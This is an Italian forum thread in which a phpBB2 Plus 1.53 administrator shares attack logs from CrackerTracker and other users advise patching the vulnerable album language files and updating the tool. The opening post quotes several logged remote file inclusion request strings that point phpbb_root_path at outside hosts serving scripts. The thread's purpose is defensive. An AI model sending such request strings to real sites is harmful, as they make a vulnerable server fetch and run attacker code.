Log strani... Attacchi hacker?

master1986

Salve a tutti.
Ho CrackerTracker ed un forum phpbb2 e noto che da qualche tempo il CrackerTracker mi segnala diversi logfile di attacco e l'ip degli autori...

Ora mi chiedo: come devo reagire???

Gli attacchi sono:

pic_id=17//language/lang_english/lang_main_album.php?phpbb_root_path=http://futurehousingsystems.com/images/control.txt?

cat_id-1&user_id=5/language/lang_english/lang_main_album.php?phpbb_root_path=http://web2.0sites.com/wp-content/uploads/2006/10/prs.txt?

sid=5fd2be95a589035a32459630b6a07b75//language/lang_english/lang_main_album.php?phpbb_root_path=%22Poweredhttp://www.palmer-werbeart.de//components/scan.txt?

phpbb_root_path=http://www.sexofv.com/galerias/rubias/monica-1/full/prs.txt?

Questi sono solo alcuni....

Datemi un parere...

Alcuni di questi colpiscono le vulnerabilità in phpbbplus 1.53 sehai effettuato il fix come detto su http://www.phpbb2.de non dovresti avere problemi!

PS: Aggiorna il ctracker alla versione 5.0.4!!!!!!

jantima

ciao robert13, assicurati di aver letto gli articoli nella prima pagina di questa sezione del forum, e assicurati di aver installato i fix per i recenti bug scoperti che hanno causato molti attacchi anche ad altra gente.

master1986

@Jantima said:

ciao robert13, assicurati di aver letto gli articoli nella prima pagina di questa sezione del forum, e assicurati di aver installato i fix per i recenti bug scoperti che hanno causato molti attacchi anche ad altra gente.

Inoltre la miglior cosa è procedere all'interno della Plus all'installazione (aggiornamento) di Ctraker alla versione 5.0.4, in Phpbbplus è presente la 2.0

robert13

Ho la 4.1.7 ma è un lavoraccio aggiornarla alla 5.0.4

Cosa rischio se un attacco di questo va a buon fine?

robert13

ho la 4.17

master1986

Ascolta ma hai PhpbbPlus?

O utilizzi Phpbb2 normale?

Altra cosa hai il Photo Album di Smartor?

robert13

ho phpbb2 plus 153 ...

non ho pulsanti per l'aggiornamento automatico, quindi dovrei rimuovere l'attuale cracker e installare il nuovo...

o c'è altro che non so?

GRAZIE A TUTTI.

master1986

Stai attento, se hai phpbbplus 1.53 assicurati di aver fixato i bug presenti nei file language che sono vulnerabili!

robert13

Non l'ho fatto... Dove li trovo???

è una domanda un po stupida, ma ho cercato già nel sito tedesco, ma non capisco un granche...

robert13

Ho trovato nel gt forum, ed ho corretto i lang_mine_album e lang_admin_album per ogni lingua.

Questo mi basta?

master1986

@robert13 said:

Ho trovato nel gt forum, ed ho corretto i lang_mine_album e lang_admin_album per ogni lingua.

Questo mi basta?

Perfetto

Fai anche questa modifica

http://www.giorgiotave.it/forum/phpbb/52911-urgente-fix-links-mod-phpbbplus-e-vulnerabile.html

Ora stai + tranquillo in questo ambito

robert13

Grazie,
ho trovato risposte più esaurienti qui che che sul forum phpbb.it

Ciao a tutti e grazie a master1986

robert13

Scusate se riapro, ma la fix:

http://www.giorgiotave.it/forum/phpbb/52749-urgente-falla-di-sicurezza-phpbbplus-1-53-fix-immediato-leggete.html

che ho inserito mi da errore di sintassi:

***/**************************************************  *************************
 *    lang_main_album.php [Italian]
 *    -------------------
 *     begin              : Sunday, February 02, 2003
 *     copyright          : (C) 2003 Smartor
 *     email              : [EMAIL="[email protected]"][email protected][/EMAIL]
 *
 *     $Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $
 *     translation      : Antonio Mercurio ([email protected]) [www.phpbbplus.it](http://www.phpbbplus.it/)
 **************************************************  **************************/*
      **if ( !defined('IN_PHPBB') ) 
{ 
   die('Hacking attempt'); 
   exit; ***/**************************************************  *************************
 *
 * This program is free software;you can redistribute it *and*/*or* modify
 * it under the terms of the GNU General Public License *as* published by
 * the Free Software Foundation;either version 2 of the License, *or*
 * (at your option) any later version.
 *
 **************************************************  *************************/*
 *//--- Album Category Hierarchy : begin*
*//--- version : 1.10*
*include*($phpbb_root_path.'language/lang_italian/lang_hierarchy_album.' . $phpEx);
*//--- Album Category Hierarchy : end***
```Ho sbagliato in qualcosa?

master1986

Certo ci sono delle stringhe sbagliate

guarda:

*** * $Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $

translation      : Antonio Mercurio ([email protected]) [www.phpbbplus.it](http://www.phpbbplus.it/)

************************************************** /
if ( !defined('IN_PHPBB') )
{
die('Hacking attempt');
exit; /******************** *************************
*

This program is free software;you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation;either version 2 of the License, or
(at your option) any later version.

************************************************** **********************/

Devi modificarlo così:

<?php
/***************************************************************************

lang_main_album.php [Italian]

begin              : Sunday, February 02, 2003

email              : [email protected]

$Id: lang_main_album.php,v 1.0.5 2003/02/22 20:12:38 ngoctu Exp $

translation      : Antonio Mercurio ([email protected]) www.phpbbplus.it

*/
/
*

This program is free software;you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation;either version 2 of the License, or
(at your option) any later version.

***************************************************************************/
if ( !defined('IN_PHPBB') )
{
die('Hacking attempt');
exit;
}

//--- Album Category Hierarchy : begin
//--- version : 1.10
include($phpbb_root_path.'language/lang_italian/lang_hierarchy_album.' . $phpEx);
//--- Album Category Hierarchy : end

robert13

Provo, grazie.

robert13

Ok...

Riapro questo argomento per segnalare il link da qui è possibile aggiornare il ctracker alla versione 5.0.4 (tramite installazione, durata 2 minuti, senza l'infinita modifica file...)

Attenzione: l'aggiornamento è solo per la versione di ctracker di phpbb2 plus 153a .

link:http://www.phpbb2.de/dload.php?action=file&file_id=834

al 63 esimo attacco in un mese ho aggiornato... non si sa mai...

Saluto tutti